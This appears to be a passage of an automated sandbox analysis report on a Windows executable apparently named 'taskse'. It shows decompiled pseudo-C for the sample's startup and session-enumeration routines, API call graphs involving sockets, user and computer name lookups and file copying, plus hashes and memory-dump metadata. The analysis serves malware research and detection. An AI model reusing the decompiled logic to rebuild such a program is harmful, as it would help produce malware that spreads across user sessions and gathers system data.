                                                      					_t38 = 0xa;
                                                      				} else {
                                                      					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                      				}
                                                      				_t40 = E00401510(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                      				_v108 = _t40;
                                                      				exit(_t40); // executed
                                                      				_t41 = _v24;
                                                      				_t49 =  *((intOrPtr*)( *_t41));
                                                      				_v124 = _t49;
                                                      				_push(_t41);
                                                      				_push(_t49);
                                                      				L004016AA();
                                                      				return _t41;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                                      • Instruction ID: 2b2245ead73f1024077fef078df1cc7ef2642006793b2c968f0509b8df6eedd3
                                                      • Opcode Fuzzy Hash: a7a4b25548869dbcf6a704162544a83af9408ecb844f832e9d15923f79edb6a4
                                                      • Instruction Fuzzy Hash: E4417DB1800344AFD7209FA4DE49AAA7FBCAB09711F24063FF541B72E1C7794941CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 70 401420-40143c LoadLibraryA 71 401449-40145b GetProcAddress 70->71 72 40143e-401448 70->72 73 401468-401478 GetProcAddress 71->73 74 40145d-401467 71->74 75 401485-4014a1 73->75 76 40147a-401484 73->76 78 4014a3-4014ad 75->78 79 4014ae-4014b6 75->79 80 4014f5-401507 79->80 81 4014b8-4014c2 79->81 82 4014c4-4014db call 401000 81->82 86 4014e1-4014ef Sleep 82->86 87 4014dd 82->87 86->82 88 4014f1 86->88 87->86 88->80
                                                      C-Code - Quality: 64%
                                                      			E00401420() {
                                                      				signed int _v4;
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				char _v16;
                                                      				signed int _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				signed int _t18;
                                                      				signed int _t19;
                                                      				signed int _t20;
                                                      				signed int _t22;
                                                      				void* _t27;
                                                      				intOrPtr _t34;
                                                      				signed int _t38;
                                                      				void* _t39;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t41;
                                                      				void* _t42;
                                                      				void* _t45;
                                                      
                                                      				_t45 =  &_v16;
                                                      				_v8 = 0;
                                                      				_t18 = LoadLibraryA("Wtsapi32.dll"); // executed
                                                      				_t40 = _t18;
                                                      				if(_t40 != 0) {
                                                      					_t19 = GetProcAddress(_t40, "WTSEnumerateSessionsA");
                                                      					_t38 = _t19;
                                                      					if(_t38 != 0) {
                                                      						_t20 = GetProcAddress(_t40, "WTSFreeMemory");
                                                      						_t41 = _t20;
                                                      						_v4 = _t41;
                                                      						if(_t41 != 0) {
                                                      							_v16 = 0;
                                                      							_v12 = 0;
                                                      							_t22 =  *_t38(0, 0, 1,  &_v16,  &_v12); // executed
                                                      							if(_v36 != 0) {
                                                      								_t39 = 0;
                                                      								if(_v32 > 0) {
                                                      									_t34 = _v16;
                                                      									_t42 = 0;
                                                      									do {
                                                      										_t27 = E00401000(_t34,  *((intOrPtr*)(_t42 + _v36)), 5, 0); // executed
                                                      										_t45 = _t45 + 0x10;
                                                      										if(_t27 == 0) {
                                                      											_v28 = _v28 + 1;
                                                      										}
                                                      										Sleep(0x64); // executed
                                                      										_t39 = _t39 + 1;
                                                      										_t42 = _t42 + 0xc;
                                                      									} while (_t39 < _v32);
                                                      									_t41 = _v24;
                                                      								}
                                                      								 *_t41(_v36);
                                                      								return _v32;
                                                      							} else {
                                                      								return _t22 | 0xffffffff;
                                                      							}
                                                      						} else {
                                                      							return _t20 | 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						return _t19 | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					return _t18 | 0xffffffff;
                                                      				}
                                                      			}

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(Wtsapi32.dll,?,?,?,00000000,00401531,?,?,0000000A), ref: 00401432
                                                      • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsA), ref: 00401455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000024.00000002.4519803798.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000024.00000002.4519766030.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519851925.0000000000402000.00000002.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519889407.0000000000403000.00000004.00000001.01000000.00000011.sdmp
                                                      • Associated: 00000024.00000002.4519936527.0000000000404000.00000002.00000001.01000000.00000011.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_36_2_400000_taskse.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: WTSEnumerateSessionsA$WTSFreeMemory$Wtsapi32.dll
                                                      • API String ID: 2574300362-1631035820
                                                      • Opcode ID: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                                      • Instruction ID: 0fb0fd342c264c5c44d83e9ea296aa1d61a1bba0d9bf3c2d8dd8de9c1a89c2df
                                                      • Opcode Fuzzy Hash: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                                      • Instruction Fuzzy Hash: C9210E326043155BC210EF2DEC8096FB3D4EBC4771F910A3FFD64A72D0D639994546A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:12.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1584
                                                      Total number of Limit Nodes:44
5190->5191 5192 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 5190->5192 5191->5141 5192->5141 5307 4076a0 5193->5307 5195 406fa8 27 API calls 5196 407119 5195->5196 5197 40711c SendMessageA #3092 5195->5197 5196->5197 5198 40713d SendMessageA #3092 5197->5198 5200 40715f SendMessageA #3092 5198->5200 5202 407181 SendMessageA #3092 5200->5202 5204 4071a3 SendMessageA #3092 5202->5204 5206 4071c5 SendMessageA #3092 5204->5206 5208 4071e7 5206->5208 5209 4071ea SendMessageA #3092 5206->5209 5208->5209 5210 407205 SendMessageA #3092 5209->5210 5212 407227 SendMessageA #3092 5210->5212 5214 407249 SendMessageA #3092 5212->5214 5216 40726b 5214->5216 5217 40726e SendMessageA #860 5214->5217 5216->5217 5218 4072a4 5217->5218 5219 4072ed #537 5218->5219 5323 404210 #858 #800 5219->5323 5221 407309 #537 5324 404210 #858 #800 5221->5324 5223 407325 #540 #2818 #535 5325 404210 #858 #800 5223->5325 5225 407369 5326 404270 5225->5326 5229 4073a8 SendMessageA SendMessageA #6140 #6140 5230 407428 5229->5230 5330 405920 5230->5330 5234 407457 5338 4058c0 5234->5338 5236 407460 5341 405180 _mbscmp 5236->5341 5238 407477 5239 405920 2 API calls 5238->5239 5240 4074ac 5239->5240 5241 405860 2 API calls 5240->5241 5242 4074b5 5241->5242 5243 4058c0 2 API calls 5242->5243 5244 4074be 5243->5244 5245 405180 4 API calls 5244->5245 5246 4074d5 GetTimeZoneInformation 5245->5246 5347 401e60 VariantTimeToSystemTime 5246->5347 5248 407508 SystemTimeToTzSpecificLocalTime #2818 5348 401e60 VariantTimeToSystemTime 5248->5348 5250 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 5250->5145 5252 406c81 SendMessageA 5251->5252 5253 406c5d 5251->5253 5254 406cc1 SendMessageA 5252->5254 5255 406ca1 SendMessageA 5252->5255 5253->5252 5355 406ae0 8 API calls 5254->5355 5256 406ae0 27 API calls 5255->5256 5258 406cba 5256->5258 5258->5150 5259 406cdd 5259->5150 5261 407fd0 fread fclose 5260->5261 5262 406659 ExitProcess 5260->5262 5374 40be90 strncpy strncpy strncpy 
5261->5374 5264 408002 5375 40c4f0 5264->5375 5266 40801d 5267 40c4f0 112 API calls 5266->5267 5268 408041 5266->5268 5267->5268 5268->5262 5269 401a10 5 API calls 5268->5269 5269->5262 5271 408124 5270->5271 5272 40820a 5270->5272 5275 4081e4 FindNextFileA 5271->5275 5278 408158 sscanf 5271->5278 5284 4081bd fclose 5271->5284 5389 401e30 5272->5389 5275->5271 5276 4081ff FindClose 5275->5276 5276->5272 5277 401e30 2 API calls 5279 408255 sprintf #537 5277->5279 5278->5275 5280 408178 fopen 5278->5280 5394 4082c0 5279->5394 5280->5275 5282 408190 fread 5280->5282 5282->5271 5282->5284 5284->5271 5284->5275 5285 408291 #537 5287 4082c0 141 API calls 5285->5287 5286 4066a5 ExitProcess 5287->5286 5289 401bf6 5288->5289 5290 401bfb CheckTokenMembership 5288->5290 5289->5158 5291 401c10 5290->5291 5292 401c14 FreeSid 5290->5292 5291->5292 5292->5158 5293->5163 5295 401b45 5294->5295 5296 401aed 5294->5296 5295->5163 5297 401af5 WaitForSingleObject 5296->5297 5298 401b26 CloseHandle CloseHandle 5296->5298 5299 401b12 5297->5299 5300 401b05 TerminateProcess 5297->5300 5298->5163 5299->5298 5301 401b1a GetExitCodeProcess 5299->5301 5300->5299 5301->5298 5303 404b81 LoadLibraryA 5302->5303 5304 404b7a 5302->5304 5305 404b96 6 API calls 5303->5305 5306 404bf6 5303->5306 5304->5186 5305->5306 5306->5186 5308 4076d9 time 5307->5308 5310 4076d7 5308->5310 5309 407771 sprintf 5309->5310 5310->5308 5310->5309 5311 405180 4 API calls 5310->5311 5312 407842 SendMessageA SendMessageA #540 5310->5312 5311->5310 5313 407894 5312->5313 5314 4078aa _ftol #2818 #2818 5313->5314 5315 4078db #2818 #2818 5313->5315 5316 407911 #3092 #6199 5314->5316 5315->5316 5317 407990 #800 5316->5317 5318 407940 5316->5318 5317->5195 5318->5317 5319 407952 InvalidateRect 5318->5319 5320 405920 2 API calls 5319->5320 5321 407978 5320->5321 5322 405920 2 API calls 5321->5322 5322->5317 5323->5221 5324->5223 5325->5225 5349 4044c0 5326->5349 5329 404210 #858 #800 5329->5229 5353 405950 InvalidateRect 
5330->5353 5332 40592d 5354 405970 InvalidateRect 5332->5354 5334 40593e 5335 405860 5334->5335 5336 405872 5335->5336 5337 405875 GetClientRect #6197 5335->5337 5336->5337 5337->5234 5339 4058d2 5338->5339 5340 4058d5 GetClientRect #6197 5338->5340 5339->5340 5340->5236 5342 4051f8 5341->5342 5343 40519e #860 5341->5343 5342->5238 5344 4051b1 5343->5344 5345 4051d1 RedrawWindow 5344->5345 5346 4051ea InvalidateRect 5344->5346 5345->5238 5346->5342 5347->5248 5348->5250 5350 4044f8 GetObjectA CreateFontIndirectA #1641 5349->5350 5351 4044ce GetParent #2864 SendMessageA #2860 5349->5351 5352 40427a #2818 #535 5350->5352 5351->5350 5351->5352 5352->5329 5353->5332 5354->5334 5356 406b88 #537 #924 sprintf #800 #800 5355->5356 5357 406bda 5355->5357 5356->5357 5360 406cf0 5357->5360 5359 406be6 #800 5359->5259 5361 406d16 5360->5361 5362 406d19 SendMessageA #353 SendMessageA #1979 5360->5362 5361->5362 5365 406dc0 SendMessageA #823 5362->5365 5366 406e00 SendMessageA 5365->5366 5367 406d7b #665 5365->5367 5369 406ed2 #825 5366->5369 5370 406e2f _strnicmp 5366->5370 5367->5359 5369->5367 5371 406e4b _strnicmp 5370->5371 5372 406e67 5370->5372 5371->5372 5372->5369 5372->5370 5373 406e87 SendMessageA #6136 5372->5373 5373->5372 5374->5264 5376 40c50f 5375->5376 5377 40bed0 110 API calls 5376->5377 5378 40c54b 5377->5378 5379 40c596 5378->5379 5380 40dd00 4 API calls 5378->5380 5381 40dbf0 free 5379->5381 5383 40c568 5380->5383 5382 40c5e7 5381->5382 5382->5266 5383->5379 5384 40c600 5383->5384 5385 40c635 5384->5385 5386 40c617 strncpy 5384->5386 5387 40dbf0 free 5385->5387 5386->5385 5388 40c650 5387->5388 5388->5266 5421 401e60 VariantTimeToSystemTime 5389->5421 5391 401e42 5422 401de0 sprintf 5391->5422 5393 401e51 5393->5277 5395 408337 5394->5395 5396 4082fb #4278 #858 #800 5394->5396 5397 408344 5395->5397 5398 408378 time 5395->5398 5396->5395 5399 408359 #800 5397->5399 5400 40834d #1200 5397->5400 5401 40839c 5398->5401 5402 40844d time 5398->5402 5403 40828c 
5399->5403 5400->5399 5401->5402 5404 4083a9 5401->5404 5402->5404 5405 408466 5402->5405 5403->5285 5403->5286 5406 4083bb 5404->5406 5407 40846c fopen 5404->5407 5405->5407 5408 4083c4 #540 time #2818 #1200 #800 5406->5408 5409 40842e #800 5406->5409 5410 4084b5 fread fclose 5407->5410 5411 408496 #800 5407->5411 5408->5409 5409->5403 5423 40be90 strncpy strncpy strncpy 5410->5423 5411->5403 5413 4084e7 5424 40c060 5413->5424 5415 408501 5416 408516 5415->5416 5417 408538 5415->5417 5418 408549 #800 5416->5418 5419 40851a #1200 time 5416->5419 5417->5418 5420 40853c #1200 5417->5420 5418->5403 5419->5418 5420->5418 5421->5391 5422->5393 5423->5413 5425 40c07f 5424->5425 5426 40bed0 110 API calls 5425->5426 5427 40c0ba 5426->5427 5428 40c0c1 5427->5428 5429 40c0e7 5427->5429 5430 40c0cc SendMessageA 5428->5430 5433 40c0db 5428->5433 5431 40c104 5429->5431 5432 40c0f8 SendMessageA 5429->5432 5430->5433 5434 40dd00 4 API calls 5431->5434 5432->5431 5435 40dbf0 free 5433->5435 5437 40c116 5434->5437 5436 40c173 5435->5436 5436->5415 5438 40c144 5437->5438 5439 40c17b 5437->5439 5440 40c154 5438->5440 5441 40c148 SendMessageA 5438->5441 5442 40c18b 5439->5442 5443 40c17f SendMessageA 5439->5443 5444 40dbf0 free 5440->5444 5441->5440 5445 40c1b4 5442->5445 5446 40c1e8 5442->5446 5443->5442 5444->5436 5447 40c1c4 5445->5447 5448 40c1b8 SendMessageA 5445->5448 5446->5433 5449 40c1f5 SendMessageA 5446->5449 5450 40dbf0 free 5447->5450 5448->5447 5449->5433 5450->5436 6106 4059d0 #561 5451 40dad0 5452 40db33 5451->5452 5453 40dadf setsockopt send shutdown closesocket 5451->5453 5453->5452 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5454 40bed0 5455 40bef5 5454->5455 5456 40bf0a #823 5454->5456 5455->5456 5457 40bf2e 5456->5457 5458 40bf27 5456->5458 5460 40bf46 5457->5460 5461 40baf0 99 API calls 5457->5461 5459 40d5e0 4 API calls 5458->5459 5459->5457 5462 40bf6b 5461->5462 5463 40bf72 
5462->5463 5464 40bf8a GetComputerNameA GetUserNameA 5462->5464 5465 40dc00 4 API calls 5464->5465 5466 40c013 5465->5466 5467 40dd00 4 API calls 5466->5467 5468 40c01f 5467->5468 5469 40dc00 4 API calls 5468->5469 5470 40c038 5469->5470 5471 40dd00 4 API calls 5470->5471 5472 40c047 5471->5472 5977 404cd0 5982 404cf0 #2414 #2414 #800 #641 5977->5982 5979 404cd8 5980 404ce8 5979->5980 5981 404cdf #825 5979->5981 5981->5980 5982->5979 6105 4019d0 EnableWindow 6107 404dd0 6 API calls 6108 404e3b SendMessageA #3092 6107->6108 6110 404e60 SendMessageA #3092 6108->6110 6112 404e93 SendMessageA 6110->6112 6113 404e7f SendMessageA 6110->6113 6281 4102d0 free 5983 4130d4 ??1type_info@@UAE 5984 4130e3 #825 5983->5984 5985 4130ea 5983->5985 5984->5985 5483 4068e0 5484 4068ef 5483->5484 5485 40691a #5280 5484->5485 5486 4068fc 5484->5486 6282 4086e0 #470 GetClientRect SendMessageA #6734 #323 6283 408765 6282->6283 6284 408838 6283->6284 6287 4087bd CreateCompatibleDC #1640 6283->6287 6285 408885 #2754 6284->6285 6286 408869 FillRect 6284->6286 6288 408897 #2381 6285->6288 6286->6288 6314 409e70 CreateCompatibleBitmap #1641 6287->6314 6291 4088b4 6288->6291 6292 408a7d 6288->6292 6291->6292 6294 4088be #3797 6291->6294 6296 409f80 BitBlt 6292->6296 6310 408a5e 6292->6310 6293 408809 6315 409f10 6293->6315 6297 408901 _ftol 6294->6297 6299 408abe 6296->6299 6304 40895e _ftol 6297->6304 6306 40897e 6297->6306 6298 408817 #6194 6298->6284 6301 408ad5 #5785 6299->6301 6302 408ac6 #5785 6299->6302 6301->6310 6302->6310 6304->6306 6305 408afe #640 #755 6307 4089a7 FillRect 6306->6307 6308 4089b8 FillRect 6306->6308 6309 4089ca 6306->6309 6307->6309 6308->6309 6309->6310 6318 409f80 6309->6318 6321 409e20 #2414 6310->6321 6312 408a50 6313 409f10 2 API calls 6312->6313 6313->6310 6314->6293 6316 409f25 #5785 6315->6316 6317 409f18 #5785 6315->6317 6316->6298 6317->6298 6319 409f88 6318->6319 6320 409f8b BitBlt 6318->6320 6319->6320 6320->6312 6321->6305 6322 40c6e0 6323 40c722 #825 
6322->6323 6324 40c6ef 6322->6324 6325 40c7b0 #825 6324->6325 6326 40c70d #825 6325->6326 6326->6324 6327 40c721 6326->6327 6327->6323 6474 40cfe0 6481 40d4c0 6474->6481 6476 40cffb 6477 40d4c0 4 API calls 6476->6477 6480 40d05e 6476->6480 6478 40d031 6477->6478 6479 40d4c0 4 API calls 6478->6479 6478->6480 6479->6480 6482 40d4d0 6481->6482 6483 40d4d9 6481->6483 6482->6476 6484 40d4e4 6483->6484 6485 40d4ee time 6483->6485 6484->6476 6486 40d575 6485->6486 6491 40d50a 6485->6491 6487 40d58a 6486->6487 6488 40d2b0 memmove 6486->6488 6487->6476 6488->6487 6489 40d569 time 6489->6486 6489->6491 6490 40d551 Sleep 6490->6491 6491->6486 6491->6489 6491->6490 5609 4043e0 #4284 #3874 #5277 5986 40a0e0 Escape 6465 404fe0 #6334 6466 404ff4 #4853 6465->6466 6467 404ffb 6465->6467 6466->6467 6126 405df0 6131 405d90 #654 #765 6126->6131 6128 405df8 6129 405e08 6128->6129 6130 405dff #825 6128->6130 6130->6129 6131->6128 5987 4090f0 5988 409124 #540 #3874 5987->5988 5989 40971e 5987->5989 5990 409185 5988->5990 5991 40915e 5988->5991 5993 40919c _ftol 5990->5993 5994 40918e #860 5990->5994 5992 40917c 5991->5992 5995 40916e #860 5991->5995 5996 4091d5 SendMessageA #2860 5992->5996 5997 40970a #800 5992->5997 5993->5992 5994->5993 5995->5992 5998 409208 5996->5998 5997->5989 6013 409870 5998->6013 6000 409232 #5875 #6170 GetWindowOrgEx #540 #2818 6002 409329 GetObjectA 6000->6002 6003 40935b GetTextExtentPoint32A 6000->6003 6002->6003 6005 40938b GetViewportOrgEx 6003->6005 6009 409411 6005->6009 6006 409630 #800 6007 409662 6006->6007 6008 40965a #6170 6006->6008 6010 409685 #2414 #2414 6007->6010 6011 40967d #5875 6007->6011 6008->6007 6009->6006 6010->5997 6011->6010 6014 409880 #2414 6013->6014 6014->6000 6328 406ef0 6329 406f03 #823 6328->6329 6330 406f6a 6328->6330 6329->6330 6331 406f25 SendMessageA ShellExecuteA #825 6329->6331 6331->6330 6115 4019f0 #765 6116 401a08 6115->6116 6117 4019ff #825 6115->6117 6117->6116 6118 4011f0 6119 40120b #5280 6118->6119 6120 4011fd 
6118->6120 6120->6119 6121 401203 6120->6121 6122 4059f0 6123 4059f8 6122->6123 6124 405a08 6123->6124 6125 4059ff #825 6123->6125 6125->6124 6492 4067f0 IsIconic 6493 406808 7 API calls 6492->6493 6494 40689a #2379 6492->6494 6495 409ff0 ExtTextOutA 6496 406380 6501 405e10 #2414 #2414 #2414 #2414 6496->6501 6498 406388 6499 406398 6498->6499 6500 40638f #825 6498->6500 6500->6499 6530 403f20 #2414 6501->6530 6503 405ed6 6531 403f20 #2414 6503->6531 6505 405eec 6532 403f20 #2414 6505->6532 6507 405f02 6533 403f20 #2414 6507->6533 6509 405f18 #2414 6534 403f20 #2414 6509->6534 6511 405f50 6535 403f20 #2414 6511->6535 6513 405f66 6536 403f20 #2414 6513->6536 6515 405f7c 6 API calls 6537 4050a0 #800 #795 6515->6537 6517 405ffe 6538 4050a0 #800 #795 6517->6538 6519 40600e 6539 404170 #2414 #800 #800 #795 6519->6539 6521 40601e 6540 404170 #2414 #800 #800 #795 6521->6540 6523 40602e 6541 404170 #2414 #800 #800 #795 6523->6541 6525 40603e 6542 404170 #2414 #800 #800 #795 6525->6542 6527 40604e #654 #765 6543 405d90 #654 #765 6527->6543 6529 406087 #609 #609 #616 #641 6529->6498 6530->6503 6531->6505 6532->6507 6533->6509 6534->6511 6535->6513 6536->6515 6537->6517 6538->6519 6539->6521 6540->6523 6541->6525 6542->6527 6543->6529 6016 40d880 6019 40d0a0 time srand rand 6016->6019 6018 40d88f 6020 40d0d3 rand 6019->6020 6021 40d0e1 6019->6021 6020->6020 6020->6021 6021->6018 5074 405580 GetClientRect 5075 4055c7 7 API calls 5074->5075 5076 4057c9 5074->5076 5077 405666 5075->5077 5078 405669 #5785 CreateSolidBrush FillRect 5075->5078 5077->5078 5079 405770 6 API calls 5078->5079 5082 4056b2 5078->5082 5079->5076 5081 4056cd BitBlt 5081->5082 5082->5079 5082->5081 5107 40db80 recv 6022 405080 6027 4050a0 #800 #795 6022->6027 6024 405088 6025 405098 6024->6025 6026 40508f #825 6024->6026 6026->6025 6027->6024 6333 404280 6334 404290 6333->6334 6335 40428b 6333->6335 6337 4042a0 #6663 6334->6337 6338 4042fd #2379 6334->6338 6336 404530 5 API calls 6335->6336 6336->6334 6339 
4042b5 GetParent #2864 SendMessageA #2379 6337->6339 6340 4042e7 ShellExecuteA 6337->6340 6340->6338 6132 403180 6137 4031a0 #2414 #2414 #616 #693 #641 6132->6137 6134 403188 6135 403198 6134->6135 6136 40318f #825 6134->6136 6136->6135 6137->6134 6138 408580 #609 6139 408598 6138->6139 6140 40858f #825 6138->6140 6140->6139 6544 409b80 6545 409b99 6544->6545 6546 409ba5 #2379 6545->6546 6547 409b9d 6545->6547 5473 407a90 5474 407bf4 #2385 5473->5474 5475 407abd 5473->5475 5475->5474 5482 404c40 #324 #540 #860 5475->5482 5477 407ae2 #2514 5478 407b72 #2414 #2414 #800 #641 5477->5478 5479 407afb 6 API calls 5477->5479 5478->5474 5480 4082c0 141 API calls 5479->5480 5481 407b61 #800 5480->5481 5481->5478 5482->5477 6141 404d90 #2370 #2289 6028 401091 6033 4010c0 #765 #641 6028->6033 6030 4010a8 6031 4010b8 6030->6031 6032 4010af #825 6030->6032 6032->6031 6033->6030 6341 414290 #825 6048 40a0a0 6049 40a0a8 6048->6049 6050 40a0ab GrayStringA 6048->6050 6049->6050 6051 4034a0 6 API calls 5598 40d6a0 htons socket 5599 40d6f3 bind 5598->5599 5600 40d814 5598->5600 5601 40d717 ioctlsocket 5599->5601 5602 40d809 5599->5602 5601->5602 5603 40d732 connect select 5601->5603 5602->5600 5604 40d80d closesocket 5602->5604 5603->5602 5605 40d78b __WSAFDIsSet 5603->5605 5604->5600 5606 40d79a __WSAFDIsSet 5605->5606 5607 40d7ac ioctlsocket setsockopt setsockopt 5605->5607 5606->5602 5606->5607 5610 4063a0 15 API calls 6160 4085a0 #781 6161 4085b8 6160->6161 6162 4085af #825 6160->6162 6162->6161 6146 4035a0 SendMessageA 6147 4035e5 OpenClipboard 6146->6147 6148 4037e9 6146->6148 6147->6148 6149 4035f7 SendMessageA 6147->6149 6150 403681 GlobalAlloc 6149->6150 6151 40360f #3301 #924 #800 #800 SendMessageA 6149->6151 6152 4037e3 CloseClipboard 6150->6152 6153 40369b GlobalLock 6150->6153 6151->6150 6151->6151 6152->6148 6154 4036b6 SendMessageA 6153->6154 6155 4036aa GlobalFree 6153->6155 6156 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6154->6156 6158 4036d6 8 API calls 
6154->6158 6155->6152 6156->6152 6159 4037bf 6158->6159 6159->6156 6348 40c6a0 6349 40c6b8 6348->6349 6350 40c6aa 6348->6350 6350->6349 6351 40c6be #825 6350->6351 6351->6349 6040 4098a0 6045 4097e0 6040->6045 6042 4098a8 6043 4098b8 6042->6043 6044 4098af #825 6042->6044 6044->6043 6046 409815 6045->6046 6047 40981e #2414 #2414 6045->6047 6046->6047 6047->6042 6352 404aa3 6353 404ab1 6352->6353 6354 404aaa GlobalFree 6352->6354 6355 404ac0 6353->6355 6356 404ab9 CloseHandle 6353->6356 6354->6353 6356->6355 5611 407db0 5618 401000 #324 #567 5611->5618 5613 407dd7 time 5614 407e09 #2514 5613->5614 5615 407dfe 5613->5615 5616 407e34 #765 #641 5614->5616 5617 407e28 time 5614->5617 5615->5614 5617->5616 5618->5613 6052 407cb0 6055 4030e0 #324 #567 #567 6052->6055 6054 407cd6 6 API calls 6055->6054 6357 40ceb0 6358 40cebc 6357->6358 6359 4130bb 2 API calls 6358->6359 6360 40ceda 6359->6360 6362 4102b0 calloc

                                                      Control-flow Graph of function 00406F80 (legend: Executed / Not Executed)
                                                      C-Code - Quality: 62%
                                                      			E00406F80(void* __ecx, void* __fp0) {
                                                      				struct HFONT__* _t135;
                                                      				long _t137;
                                                      				long _t138;
                                                      				long _t139;
                                                      				long _t141;
                                                      				long _t142;
                                                      				long _t143;
                                                      				long _t145;
                                                      				long _t146;
                                                      				long _t147;
                                                      				long _t149;
                                                      				void* _t214;
                                                      				int _t216;
                                                      				int _t235;
                                                      				int _t238;
                                                      				int _t240;
                                                      				int _t242;
                                                      				int _t245;
                                                      				int _t248;
                                                      				int _t251;
                                                      				int _t253;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      				int _t339;
                                                      				void* _t348;
                                                      				int _t352;
                                                      				intOrPtr _t355;
                                                      				intOrPtr _t356;
                                                      				intOrPtr _t357;
                                                      				intOrPtr _t358;
                                                      				void* _t359;
                                                      				void* _t360;
                                                      				void* _t361;
                                                      				void* _t375;
                                                      
                                                      				_t375 = __fp0;
                                                      				_push(0xffffffff);
                                                      				_push(E00413E9B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t355;
                                                      				_t356 = _t355 - 0xd4;
                                                      				_t348 = __ecx;
                                                      				_push(0);
                                                      				E004076A0(__ecx);
                                                      				_push(CreateSolidBrush(0xe0));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x121284));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe000));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe00000));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x3834d1));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x107c10));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xe8a200));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0xd77800));
                                                      				L00412D5E();
                                                      				_push(CreateSolidBrush(0x3cda));
                                                      				L00412D5E();
                                                      				_t339 = __ecx + 0x880;
                                                      				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                                      				L00412D5E();
                                                      				_t216 = __ecx + 0x888;
                                                      				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
                                                      				L00412D5E();
                                                      				_t352 = __ecx + 0x890;
                                                      				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                                      				_push(_t135);
                                                      				L00412D5E();
                                                      				_push(0x3ed);
                                                      				L00412CE6();
                                                      				if(_t339 != 0) {
                                                      					_t339 =  *(_t339 + 4);
                                                      				}
                                                      				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
                                                      				_push(0x3fe);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t235 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t235 = 0;
                                                      				}
                                                      				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
                                                      				_push(0x3fb);
                                                      				L00412CE6();
                                                      				if(_t216 != 0) {
                                                      					_t238 =  *(_t216 + 4);
                                                      				} else {
                                                      					_t238 = 0;
                                                      				}
                                                      				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
                                                      				_push(0x3ff);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t240 =  *(_t352 + 4);
                                                      				} else {
                                                      					_t240 = 0;
                                                      				}
                                                      				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
                                                      				_push(0x3fc);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t242 =  *(_t352 + 4);
                                                      				} else {
                                                      					_t242 = 0;
                                                      				}
                                                      				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
                                                      				_push(0x400);
                                                      				L00412CE6();
                                                      				if(_t352 != 0) {
                                                      					_t245 =  *(_t352 + 4);
